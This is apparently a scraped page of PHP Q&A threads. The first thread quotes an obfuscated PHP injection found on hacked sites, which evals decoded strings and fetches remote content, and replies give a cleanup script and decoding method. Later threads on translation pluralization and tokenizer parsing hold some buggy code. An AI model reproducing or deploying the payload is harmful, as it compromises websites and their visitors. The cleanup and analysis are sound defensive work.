$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is far as I have time for, but if you wanted to continue you may find the following url useful.
Good luck
I found the same code in a Wordpress instance and wrote a short script to remove it of all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
$contents = file_get_contents($filename);
if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
echo $filename.PHP_EOL;
file_put_contents($filename, substr($contents, 13280));
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URL's inside are the same too:
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.

How to translate strings in PHP in dependancy of gender and count?

I am working on multilingual application with a centralized language system. It's based on language files for each language and a simple helper function:
$lang['access_denied'] = "Access denied.";
$lang['action-required'] = "You need to choose an action.";
return $lang;
function __($line) {
return $lang[$line];
Up til now, all strings were system messages addressed to the current user, hence I always could do it that way. Now, I need create other messages, where the string should depend on a dynamic value. E.g. in a template file I want to echo the number of action points. If the user only has 1 point, it should echo "You have 1 point."; but for zero or more than 1 point it should be "You have 12 points."
For substitution purposes (both strings and numbers) I created a new function
function __s($line, $subs = array()) {
$text = $lang[$line];
while (count($subs) > 0) {
$text = preg_replace('/%s/', array_shift($subs), $text, 1);
return $text;
Call to function looks like __s('current_points', array($points)).
$lang['current_points'] in this case would be "You have %s point(s).", which works well.
Taking it a step further, I want to get rid of the "(s)" part. So I created yet another function
function __c($line, $subs = array()) {
$text = $lang[$line];
$text = (isset($sub[0] && $sub[0] == 1) ? $text[0] : $text[1];
while (count($subs) > 0) {
$text = preg_replace('/%d/', array_shift($subs), $text, 1);
return $text;
Call to function looks still like __s('current_points', array($points)).
$lang['current_points'] is now array("You have %d point.","You have %d points.").
How would I now combine these two functions. E.g. if I want to print the username along with the points (like in a ranking). The function call would be something like __x('current_points', array($username,$points)) with $lang['current_points'] being array("$s has %d point.","%s has %d points.").
I tried to employ preg_replace_callback() but I am having trouble passing the substitute values to that callback function.
$text = preg_replace_callback('/%([sd])/',
'switch($type) {
case "s": return array_shift($subs); break;
case "d": return array_shift($subs); break;
Apparently, $subs is not defined as I am getting "out of memory" errors as if the function is not leaving the while loop.
Could anyone point me in the right direction? There's probably a complete different (and better) way to approach this problem. Also, I still want to expand it like this:
$lang['invite_party'] = "%u invited you to $g party."; should become Adam invited you to his party." for males and "Betty invited you to her party." for females. The passed $subs value for both $u and $g would be an user object.
As mentionned by comments, I guess gettext() is an alternative
However if you need an alternative approach, here is a workaround
class ll
private $lang = array(),
$langFuncs = array(),
$langFlags = array();
function __construct()
$this->lang['access'] = 'Access denied';
$this->lang['points'] = 'You have %s point{{s|}}';
$this->lang['party'] = 'A %s invited you to {{his|her}} parteh !';
$this->lang['toto'] = 'This glass seems %s, {{no one drank in already|someone came here !}}';
$this->langFuncs['count'] = function($in) { return ($in>1)?true:false; };
$this->langFuncs['gender'] = function($in) { return (strtolower($in)=='male')?true:false; };
$this->langFuncs['emptfull'] = function($in) { return ($in=='empty')?true:false; };
$this->langFlags['points'] = 'count';
$this->langFlags['toto'] = 'emptfull';
$this->langFlags['party'] = 'gender';
public function __($type,$param=null)
if (isset($this->langFlags[$type])) {
$f = $this->lang[$type];
list ($ifTrue,$ifFalse) = explode("|",$m[1]);
if($this->langFuncs[$this->langFlags[$type]]($param)) {
return $this->__s(preg_replace("/{{(.*?)}}/",$ifTrue,$this->lang[$type]),$param);
} else {
return $this->__s(preg_replace("/{{(.*?)}}/",$ifFalse,$this->lang[$type]),$param);
} else {
return $this->__s($this->lang[$type],$param);
private function __s($s,$i=null)
return str_replace("%s",$i,$s);
$ll = new ll();
echo "Call : access - NULL\n";
echo $ll->__('access'),"\n\n";
echo "Call : points - 1\n";
echo $ll->__('points',1),"\n\n";
echo "Call : points - 175\n";
echo $ll->__('points',175),"\n\n";
echo "Call : party - Male\n";
echo $ll->__('party','Male'),"\n\n";
echo "Call : party - Female\n";
echo $ll->__('party','Female'),"\n\n";
echo "Call : toto - empty\n";
echo $ll->__('toto','empty'),"\n\n";
echo "Call : toto - full\n";
echo $ll->__('toto','full');
This outputs
Call : access - NULL
Access denied
Call : points - 1
You have 1 point
Call : points - 175
You have 175 points
Call : party - Male
A Male invited you to his parteh !
Call : party - Female
A Female invited you to her parteh !
Call : toto - empty
This glass seems empty, no one drank in already
Call : toto - full
This glass seems full, someone came here !
This may give you an idea on how you could centralize your language possibilities, creating your own functions to resolve one or another text.
Hope this helps you.
If done stuff like this a while ago, but avoided all the pitfalls you are in by separating concerns.
On the lower level, I had a formatter injected in my template that took care of everything language-specific. Formatting numbers for example, or dates. It had a function "plural" with three parameters: $value, $singular, $plural, and based on the value returned one of the latter two. It did not echo the value itself, because that was left for the number formatting.
The whole translation was done inside the template engine. It was Dwoo, which can do template inheritance, so I set up a master template with all HTML structure inside, and plenty of placeholders. Each language was inheriting this HTML master and replaced all placeholders with the right language output. But because we are still in template engine land, it was possible to "translate" the usage of the formatter functions. Dwoo would compile the template inheritance on the first call, including all subsequent calls to the formatter, including all translated parameters.
The gender problem would be getting basically the same soluting: gender($sex, $male, $female), with $sex being the gender of the subject, and the other params being male or female wording.
Perhaps a better aproach is the one used by function t in Drupal, take a look:!!

PHP Constant string parameters token

In a system we will be using, there is a function called "uses". If you are familiar with pascal, the uses clause is where you tell your program what dependencies it has (similar to C and PHP includes).
This function is being used in order to further control file inclusion other than include(_once) or require(_once).
As part of testing procedures, I need to write a dependency visualization tool for statically loaded files.
Statically Loaded Example: uses('core/core.php','core/security.php');
Dynamically Loaded Example: uses('exts/database.'.$driver.'.php');
I need to filter out dynamic load cases because the code is tested statically, not while running.
This is the code I'm using at this time:
$inuses=false; // whether currently in uses function or not
$uses=array(); // holds dependencies (line=>file)
$tknbuf=array(); // last token
foreach(token_get_all(file_get_contents($file)) as $token){
// detect uses function
if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true;
// detect uses argument (dependency file)
if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token;
// detect the end of uses function
if($inuses && is_string($token) && $token==')'){
? $uses[$tknbuf[2]][]=$tknbuf[1]
: $uses[$tknbuf[2]]=array($tknbuf[1]);
// a new argument (dependency) is found
if($inuses && is_string($token) && $token==',')
? $uses[$tknbuf[2]][]=$tknbuf[1]
: $uses[$tknbuf[2]]=array($tknbuf[1]);
Note: It may help to know that I'm using a state engine to detect the arguments.
My issue? Since there are all sorts of arguments that can go in the function, it is very difficult getting it right.
Maybe I'm not using the right approach, however, I'm pretty sure using token_get_all is the best in this case. So maybe the issue is my state engine which really isn't that good.
I might be missing the easy way out, thought I'd get some peer review off it.
Edit: I took the approach of explaining what I'm doing this time, but not exactly what I want.
Put in simple words, I need to get an array of the arguments being passed to a function named "uses". The thing is I'm a bit specific about the arguments; I only need an array of straight strings, no dynamic code at all (constants, variables, function calls...).
Using regular expressions:
file_get_contents('uses.php'), $matches, PREG_SET_ORDER);
foreach ($matches as $set) {
list($full, $match) = $set;
echo "$full\n";
// try to remove function arguments
$new = $match;
do {
$match = $new;
$new = preg_replace('/\([^()]*\)/', '', $match);
} while ($new != $match);
// iterate over each of the uses() args
foreach (explode(',', $match) as $arg) {
$arg = trim($arg);
if (($arg[0] == "'" || $arg[0] == '"') && substr($arg,-1) == $arg[0])
echo " ".substr($arg,1,-1)."\n";
Running against:
uses('bar.php', 'test.php', $foo->bar());
uses(bar('test.php'), 'file.php');
uses(bar(foo('a','b','c')), zed());
uses('bar.php', 'test.php', $foo->bar())
uses(bar('test.php'), 'file.php')
uses(bar(foo('a','b','c')), zed())
Obviously it has limitations and assumptions, but if you know how the code is called, it could be sufficient.
OK I got it working. Just some minor fixes to the state engine. In short, argument tokens are buffered instead of put in the uses array directly. Next, at each ',' or ')' I check if the token is valid or not and add it to the uses array.
$inuses=false; // whether currently in uses function or not
$uses=array(); // holds dependencies (line=>file)
$tknbuf=array(); // last token
$tknbad=false; // whether last token is good or not
foreach(token_get_all(file_get_contents($file)) as $token){
// detect uses function
if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true;
// token found, put it in buffer
if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token;
// end-of-function found check buffer and throw into $uses
if($inuses && is_string($token) && $token==')'){
if(count($tknbuf)==3 && !$tknbad)isset($GLOBALS['uses'][$file][$tknbuf[2]])
? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1]
: $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]);
$tknbuf=array(); $tknbad=false;
// end-of-argument check token and add to $uses
if($inuses && is_string($token) && $token==','){
if(count($tknbuf)==3 && !$tknbad)isset($GLOBALS['uses'][$file][$tknbuf[2]])
? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1]
: $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]);
$tknbuf=array(); $tknbad=false;
// if current token is not an a simple string, flag all tokens as bad
if($inuses && is_array($token) && $token[0]!=T_CONSTANT_ENCAPSED_STRING)$tknbad=true;
Edit: Actually it is still faulty (a different issue though). But the new idea I've had ought to work out nicely.
